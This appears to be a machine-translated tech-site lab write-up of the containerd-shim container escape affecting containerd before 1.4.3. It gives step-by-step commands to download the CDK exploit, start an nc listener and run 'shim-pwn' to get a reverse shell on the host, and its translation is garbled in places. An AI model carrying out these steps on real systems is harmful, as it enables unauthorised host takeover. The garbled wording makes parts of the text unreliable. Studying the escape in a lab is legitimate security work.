Shulou(Shulou.com)05/31 Report--

This article mainly explains "Docker container escape loophole case analysis", interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Next let the editor to take you to learn the "Docker container escape vulnerability case analysis"!

I. introduction of loopholes

Loophole principle

Containerd is a daemon that controls runC, providing a command-line client and API for managing containers on a machine. When the docker is started with the-net=host parameter to share the net namespace with the host, an attacker in the container can bypass the access rights to access the control API of the containerd, resulting in privilege escalation, thus realizing the Docker container escape.

Containerd is an industry standard container runtime that can be used as a daemon for Linux and Windows. In containers prior to versions 1.3.9 and 1.4.3, the container-filled API was incorrectly exposed to the host network container. The access control of the populated API socket verifies that the valid UID of the connection process is 0, but does not otherwise restrict access to the abstract Unix domain socket. This will allow a malicious container running in the same network namespace as the filler (the valid UID is 0, but the privilege is reduced) to cause the new process to run with elevated privileges.

Affect the version

Containerd

< 1.4.3 containerd < 1.3.9 实验环境： 被攻击机（ubuntu）ip：192.168.163.129 被攻击机containerd版本：1.2.6 攻击机（kali）ip：192.168.163.131 POC下载：https://github.com/Xyntax/CDK/releases/tag/0.1.6 二、环境介绍 01 被攻击机查看docker版本，显示Containerd Version : 1.2.6 命令：docker version 02 为了区分被攻击机的真实环境和被攻击机的docker环境分别在/root目录下面创建不同文件 被攻击机的docker环境：docker环境下面的/root目录下面没有文件，为了便于区分，复制一个dockerfile文件到/root目录下 被攻击机的真实环境：真实环境下面的/root目录放置了一个true文件

III. Recurrence of loopholes

01

The container that lists the attacked aircraft in the real environment.

Command: docker ps

02

The attacked plane starts the container by sharing the host network and goes directly into the docker container.

Run a container with-- net=host as the startup parameter (here to facilitate the direct selection of the existing container vulhub/activemq:5.11.1, but a separate container will be created and the image will not be dropped, but the two containers are not related)

Command: docker run-it-- net=host vulhub/activemq:5.11.1 / bin/bash

03

The containers of the attacked plane are listed in the real environment of the attacked plane. The container we just created is container id: 4ad4f620e6a5.

Command: docker ps

04

Execute the command in the docker container of the attacked machine, and you can see the abstract namespace Unix domain socket

Command: cat / proc/net/unix | grep-a "containerd-shim"

Principle Note: in the communication model of containerd- > containerd-shim- > runc, the interface of containerd-shim is exposed as abstract unix socket. When docker starts with-- net=host parameter and shares net namespace with host, the unix socket can be accessed inside the container. Through this socket, attackers in the container can control the downstream runc process to start a new malicious image and escape through the image.

05

To facilitate viewing, the attacked machine changes to the / tmp directory under the docker environment to operate. Download the corresponding poc and decompress it.

Download the poc command: wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

Extract poc command: tar-zxvf cdk_v0.1.6_release.tar.gz

06

Kali attack plane opens listening port 12345

Command: nc-lvp 12345

07

Execute commands in the docker environment of the attacked plane and establish a connection using poc

Command:. / cdk_linux_386 run shim-pwn 192.168.163.131 12345

08

The Kali attack plane successfully obtained the rebound shell of the real environment of the attacked plane (you can see from the files in the / root directory that the rebound is the shell of the real host)

Note:

There are many points for attention in this experiment (only limited to the pits in the course of my experiment):

1. I originally intended to use vulhub's S2-032 environment vulnerability to escape docker by remote command execution using Struts2 tools. It was found that the abstract namespace Unix domain socket could not be seen when executing command: cat / proc/net/unix | grep-a "containerd-shim", and Cannot find vulnerable socket was displayed when executing poc (I used the docker environment that docker exec-it 6970bdddacc6 / bin/bash entered)

2. Note that when you create a new container with-net=host, the image name is the same. Pay attention to the distinction, otherwise the executed command will enter another container.

3. This utilization condition is carried out under the environment of completely controlling the docker container of the attacked aircraft, and the real environment of the attacked aircraft is controlled by the docker environment of the attacked aircraft.

At this point, I believe that everyone on the "Docker container escape vulnerability case analysis" have a deeper understanding, might as well to the actual operation of it! Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.